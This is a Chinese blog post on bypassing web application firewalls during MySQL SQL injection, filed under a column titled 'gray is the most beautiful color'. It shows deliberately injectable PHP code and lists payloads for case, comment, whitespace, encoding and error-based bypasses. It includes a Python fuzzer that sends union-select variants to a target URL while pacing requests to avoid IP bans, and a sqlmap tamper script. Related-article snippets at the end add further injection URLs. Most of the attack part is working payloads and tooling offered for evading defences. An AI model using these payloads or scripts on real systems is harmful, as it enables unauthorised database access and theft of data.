渗透测试mysql SQL注入——WAF 绕过原理

最新推荐文章于 2024-07-16 14:11:47 发布
最新推荐文章于 2024-07-16 14:11:47 发布
阅读量1.6k 收藏 7
点赞数 2
分类专栏: 灰色是最美的颜色 文章标签: 渗透测试 SQL注入 waf绕过原理 waf绕过
辛苦原创,请勿盗取。
本文链接:https://blog.csdn.net/shuryuu/article/details/104341145
版权

WAF绕过必要条件
1,熟练掌握mysql函数和语法使用方法
2,深入了解中间件运行处理机制
3,了解WAF防护处理原理和方法

一,WAF绕过原理——白盒绕过
代码样例

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);
	if($row)
	{
	  	echo "<font size='5' color= '#99FF00'>";	
	  	echo 'Your Login name:'. $row['username'];
	  	echo "<br>";
	  	echo 'Your Password:' .$row['password'];
	  	echo "</font>";
  	}
	else 
	{
		echo '<font color= "#FFFF00">';
		print_r(mysql_error());
		echo "</font>";  
	}
}
else 
{ 
	echo "Please input the ID as parameter with numeric value";
}


function blacklist($id)
{
	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
	$id= preg_replace('/AND/i',"", $id);		//Strip out AND (non case sensitive)
	
	return $id;
}

1,1代码分析
这个通过分析代码发现定义了blacklist黑名单功能然后是直接正则匹配过滤了or和and并忽略大小写
1,2绕过限制
因为这里匹配的是or 和AND
(1)大小写变形:Or OR oR
(2)等价替换:and=&& or=||
二,WAF绕过原理——黑盒绕过
1,架构层绕过WAF
(1)寻找源站——>针对云waf
(2)利用同网段——>绕过waf防护区域
(3)利用边界漏洞——>绕过waf防护区域
2,资源限制角度绕过waf
post传入大的数据包body
3,协议层面绕过waf检测
(1)协议为覆盖waf
请求方式变换:GET->POST
Content-Type变换:application/x-www-form-urlencoded————>multipart/form-data
(2)参数污染
index.php?id=1&id=2
这里遇到的是waf只是针对第一传参进行检测未对第二个传参进行检测
4,规则层面绕过
4.1sql注释符绕过

(1)union /**/select 
(2)union /*aaaaaaa%01bbs*/select 
(3)union /*aaaaaaaaaaaaaaaaaaaaa*/select
(4)内联注释:/*!xxxxxxxx*/

4.2空白符绕过
(1)mysql空白符

%09,%0A,%0B,%0C,%0D,%20,%A0,/*xxx*/`

(2)正则匹配的空白符:

%09,%0A,%0B,%0D,%20

4.3函数分隔符号
(1)concat%2520(
(2)concat/**/(
(3)concat%250c(
(4)concat%25a0(
4.4浮点数词解析
(1)selectfrom users where id=8E0union select 1,2,3,4,5,6,7#
(2)selectfrom users where id=8.0union select 1,2,3,4,5,6,7#
(3)select*from users where id=\Nunion select 1,2,3,4,5,6,7#
4.5利用报错进行sql注入
error-based sql注入函数非常容易被忽略

(1)extractvalue(1,concat(0x5c,md5(3)));
(2)updatexml(1,concat(0x5c,md5(3)));
(3)GeometryCollection(select *from (select *from (select @@version)x))
(4)polygon((select *from (select name_const(version(),1))x))
(5)linestring()
(6)multipoint()
(7)multilinestring()
(8)multipolygon()

4.6mysql特殊语法

select {x table_name}from{x information_schema.tables};

三,Fuzz绕过WAF
1,以注释符为例子不断fuzz
(1)先测试最基本的语句
union/**/select
(2)再测试中间引入特殊字符
union/aaaa%01bbs/select
(3)最后测试注释长度
union/aaaaaaaaaaaaaaaaaaaaaa/select
最基本的模式
union/anything/select

补充一下绕过的姿势,具体例子等我有空再补:

  1. 断包绕过
  2. 缓冲区溢出
  3. 协议不兼容
  4. 参数污染
  5. 大小写绕过
  6. 编码绕过
  7. 注释绕过
  8. 等价替换

 

FUZZ脚本编写

:随机伪造UA头,每次请求都使用随机生成的UA头。为了减少复杂度,随机生成UA头的功能可以通过第三方模块库fake-useragent实现,

 

 

可以使用pip进行快速安装。

pip install fake-useragent

# ! -*- encoding:utf-8 -*-
#The author:@whit

import requests,time
def Jaky(url_start):
  fuzz_aa = ['/*', '*/', '/*!', '*', '=', '`', '!', '@', '%', '.', '-', '+', '|', '%00']
  fuzz_bb = ['', ' ']
  fuzz_cc = ["%0a", "%0b", "%0c", "%0d", "%0e", "%0f", "%0g", "%0h", "%0i", "%0j"]
  fuzz = fuzz_aa + fuzz_bb + fuzz_cc
  headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25"
    }
#也可以采用随机头,过waf更放心

  for a in fuzz:
      for b in fuzz:
          for c in fuzz:
              for d in fuzz:
                  exp = "/*!union" + a + b + c + d + "select*/ 1,2,3"
                  url = url_start + exp
                  res = requests.get(url=url, headers=headers)
                  time.sleep(2)#延迟2秒,防止被禁ip
                  print("Now URL:" + url)
                  if "技术支持" in res.text: #检测关键词需要自行修改
                      print("Find Fuzz bypass:" + url)
                          
if __name__ == '__main__':
  Jaky("http://www.xxx.cn/article/article.php?id=4")
#这里我只采用了简单的5层套用。应该是够用了。
#!/usr/bin/env python
#Author:whit

from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
import os

__priority__ = PRIORITY.LOW

def dependencies():
    singleTimeWarnMessage("whit_Bypass_whit '%s' is %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))

def tamper(payload, **kwargs):
    payload=payload.replace('AND','/*!53203520AND*/')
    payload=payload.replace('ORDER','/*!53203520order*/')
    payload=payload.replace("SELECT","/*!53203520select")
    payload=payload.replace('USER())','hex(user/**/()))')
    payload=payload.replace('SESSION_USER()','hex(SESSION_USER(-- B%0a))')
    payload=payload.replace('UNION ALL SELECT','union/*!53203520/**/select*/')
    return payload

篡改脚本编写

 

 

 

 

 

 

 

白夜鬼魅
关注
专栏目录
sql注入内联注释waf
qq_36282328的博客
01-17 1万+
sql注入内联注释waf 正常输入:1 然后尝试:-1 order by 被拦截 然后单独尝试order或者by 单独的order或者by并没有被拦截,内联注释干扰黑名单检测 -1/**/order/**/by 3 只是简单的/**/也被过滤了,那么就在/**/中间加干扰 用-1 and 1=1来进行测试,burp抓包,然后在被过滤的关键字前后加注释注释中间用§ §来进行爆破定点,配置...
见招拆招:绕过WAF继续SQL注入常用方法
weixin_30764137的博客
06-20 703
  这篇文章之前的名字叫做:WAF bypass for SQL injection #理论篇,我于6月17日投稿了Freebuf。链接:点击这里现博客恢复,特发此处。   Web Hacker总是生存在与WAF的不断抗争之中的,厂商不断过滤,Hacker不断绕过WAF bypass是一个永恒的话题,不少基友也总结了很多奇技怪招。那今天我在这里做个小小的扫盲吧。先来说说WAF bypass是...
SQL注入绕过安全狗的waf防火墙,这一篇就够了,8k文案超详细
最新发布
xt350488的博客
07-16 1689
通过本文的详细解析和实验,我们深入了解了SQL注入攻击的基本原理及其在实际应用中的变种和绕过技巧。在面对如安全狗这样的WAF防护时,攻击者并非束手无策,而是可以通过多种方式绕过检测规则,成功实施SQL注入攻击。本文首先通过基础的SQL注入测试,验证了安全狗WAF对“and 1=1”等简单SQL注入模式的识别能力。随后,通过拆分和注释符的使用,我们发现WAF可能是通过识别特定模式(如“and”后紧跟空格和字符)来拦截SQL注入的。
MYSQL注入绕过技巧
eT48_Sec
12-23 5486
/lingdao.php?id=161.0ORDER BY%2B9 /lingdao.php?id=4.990Union(select-1.0,2,3,4,5,6,7,@@version) Article/show/id/4.0Union(select-0.1,2,USER,password,5,6,7,8,9,10,11,12,13.0FROM mysql%252euser)
mysql手工注入绕过防火墙_mssql手工注入及绕过
weixin_42466518的博客
02-06 472
报错注入:-例子:http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1【1】首先爆版本:http://www.kfgtfcj.xxx.cn/lzygg/Zixun_show.aspx?id=1 and @@version>0报错信息:在将 nvarchar 值 'Microsoft SQL Server 2008 R2 (RTM) - 10...
渗透测试waf绕过基础
qi_SJQ_的博客
01-28 3823
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 思维导图 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 思维导图: 一、信息收集 此处只针对对于目标网站直接扫描的信息收集讲解,其他辅助信息收集手段如:查旁站/识别cms等手段也不会遇到waf拦截。 1.安全狗—防ddos cenos目前用的不熟练,于是我将服务器系统换成了winserver,搭建上web环境和安全狗,打开cc拦截开关,本地.
手把手教你用Python轻松玩转SQL注入——渗透利器
pyjishu的博客
03-25 2212
前言 大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。 一、浅谈SQL注入 SQL注入其实就是把SQL命令插入到WEB表单中提交或者输入一些页面请求的查询字符串,比如我们输网址,就是相当于这种操作,只不过我们不是在测试SQL注入漏洞,而仅仅只是为了输入后看到相应网页上的内容而已。一般方法有,如:猜数据表名,其次就是绕过后.
SQL注入——渗透day07
qq_62716256的博客
09-01 1026
wql注入
渗透测试——sql注入
yukinorong的博客
07-23 594
判断注入点 单引号判断 http://xxx/abc.php?id=1' 如果页面返回错误,则存在 Sql 注入。 原因是无论字符型还是整型都会因为单引号个数不匹配而报错。 (如果未报错,不代表不存在 Sql 注入,因为有可能页面对单引号做了过滤,这时可以使用判断语句进行注入) 判断sql注入类型 数字型 ?id= x and 1=2 页面运行错误,则说明此 Sql 注入为数字型注入。 字符型 ?id= x' and '1'='2 页面运行错误,则说明此 Sql 注入为字符型注入。 sq
渗透测试之突破口——IIS写权限和Bypass WAF
m0_61506558的博客
10-18 359
poc完整的命令行可能产生的影响包括拒绝服务,信息泄露,任意代码执行(取决于目标应用程序和系统)。由于使用了escapeshellcmd(),不易受命令注入的影响,使用本方法一个poc不限于任何位置,文件如,powershell带-enc执行,或mshta等方法,可参考https://lolbas-project.github.io/,但是依照windows的特性,在无法将完整字符串解析为有效路径的情况下,会拆分空格后面的内容,这里可以使用&符号0x02 Fuzz/扫描web。
mysql绕过_mysql注入绕过的一些技巧
weixin_39810196的博客
01-18 354
虽然mysql + php的开发中可以使用pdo中,但是有些老久的程序没有使用,或其他原因1.注释绕过select/*comment*/user/*zzsdsdsf*/from mysql.user;2.内联注释绕过/*!12345select*//*!12345user*/ from mysql.user;3.特殊空白字符绕过在php中\s会匹配0x09,0x0a,0x0b,0x0c,0x0d,...
mysql绕过_Mysql注入绕过姿势
weixin_31618799的博客
01-18 329
1.内联绕过2.编码绕过,如URLEncode编码,ASCII,HEX,unicode编码绕过or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。十六进制编码SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))双重编码绕过?id=1%252f%2...
mysql手工注入绕过_从一个ctf简单总结下mysql手工注入
weixin_30303283的博客
01-21 309
文章最后更新时间为:2019年04月03日 15:26:470x01 先拿flag有个很不错的ctf平台jarvisoj,上面收录了一些经典的ctf题目。今天做了一个web题,借此记录一下sql手工注入的语句。hint:先找到源码再说吧~~...
mysql注入转义绕过_SQL注入防御绕过——二次注入
weixin_33124479的博客
01-28 691
01 二次注入原理二次注入可以理解为,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。二次注入,可以概括为以下两步:第一步:插入恶意数据进行数据库插入数...
mysql 注入绕过upupw_论SQL注入绕过技术—Hack之路
weixin_29967445的博客
01-19 352
SQL注入绕过技术大小写绕过注入例如大小写绕过注入的测试地址:http://192.168.0.106/sqli/?id=1。访问id=1’,发现错误页面爆出MySQL错误,当访问id=1 and 1=1 时,页面返回”no 小结:关于 id=1 and 1=1被拦截,则进行大小写转换绕过(aNd 1=1,AND 1=1,And,AnD 1=1) 使用order by查询字段数量,发现还是被...
记一次MySQL注入绕过
末初的CSDN博客
10-01 2202
来源于今天一位朋友叫我帮忙看的题目 查看源码发现提示 存在过滤且,limit参数只能为单个数字 fuzz一下sql注入关键字看看都过滤了哪些字符 直接在class参数插入exp(100)回显正常,插入exp(1000)发现返回database error;说明此处sql注入可直接插入执行,其次如果sql语句执行错误会返回报错提示; 那么就可以做布尔盲注了,但是比较棘手的是过滤了逗号,;不能使用if进行条件判断;绕过逗号的方法from x for y不能在if中使用。 if无法使用可以用c.
MySQL注入及绕过备忘录
weixin_43610673的博客
04-25 5178
SQL注入(以Mysql为例) 大致分为有回显和无回显两类进行梳理,重心会放在盲注这一块,正则匹配等一些技巧都放在盲注部分。 使用sql-labs进行演示,在challenges数据库中在添加一个flag数据库表,并修改sql-labs源码使其回显执行的sql语句,方便演示。 判断是否存在SQL注入 本质都是看页面是否出现异常 加单引号’、双引号”、单括号)、双括号))或者进行组合看看是否报错(字符型)。 服务器不返回报错信息时,加 and 1=1 、 and 1=2 看页面是否有变化(数字型),字符型
mysql特有的特性绕过_waf绕过:基于mysql特性的waf绕过技巧小总结
weixin_39988888的博客
01-20 183
研究过国内外的waf。分享一些 奇淫绝技。一些大家都了解的技巧如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造轮子。Mysqltips1: 神奇的 ` (格式输出表的那个控制符)过空格和一些正则。mysql> select`version`();+———————-+|`version`()|+———————-+|5.1.50-commu...
SQL注入绕过技巧:新手实用的避开WAF方法
SQL注入攻击中,绕过速查表是渗透测试人员常用的技巧,特别是对于新手来说,理解并掌握这些方法能有效提高攻击效率和隐蔽性。本文将介绍几种常见的SQL注入绕过技术,包括但不限于: 1. **绕过Web应用防火墙(WAF...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值